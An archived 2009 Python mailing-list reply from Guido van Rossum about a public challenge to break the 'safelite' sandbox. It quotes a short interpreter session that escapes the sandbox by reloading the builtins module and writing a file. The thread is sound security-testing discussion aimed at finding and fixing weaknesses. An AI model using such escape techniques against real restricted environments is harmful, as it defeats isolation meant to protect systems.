On Mon, Feb 23, 2009 at 1:36 PM, Guido van Rossum <gu...@python.org> wrote:
> On Mon, Feb 23, 2009 at 1:12 PM, Victor Stinner
> <victor.stin...@haypocalc.com> wrote:
>>> The challenge is simple:
>>>
>>> * Open a fresh Python interpreter
>>> * Do:
>>>     from safelite import FileReader
>>> * You can use FileReader to read files on your filesystem
>>> * Now find a way to *write* to the filesystem from your interpreter
>>
>> Well, the challenge is to get access to a module. And... it's quite simple
>> :-p
>>
>> $ ./python
>> >>> from safelite import FileReader
>> >>> __builtins__.file
>> Traceback (most recent call last):
>>   File "<stdin>", line 1, in <module>
>> AttributeError: 'module' object has no attribute 'file'
>> >>> reload(__builtins__)
>> <module '__builtin__' (built-in)>
>> >>> file('0wn3d', 'w').write('w00t\n')
>> >>>
>> $ cat 0wn3d
>> w00t
>>
>>> Dinner and drinks on me for an evening -- when you are next in London
>>> or I am in your town -- to the first person who manages to break
>>> safelite.py and write to the filesystem.
>>
>> Cool. It's a good reason to go to Pycon UK this year ;-)
>
> Tav should have made another stipulation: the attack must not be
> trivial to fix. This one seems trivial, e.g. by adding 'reload' to the
> list in secure_python_builtins().

I take it back, we need to find all the trivial ones too.

BTW Tav, you ought to create a small website for this challenge. A
blog post or wiki page would suffice.

-- 
--Guido van Rossum (home page: http://www.python.org/~guido/)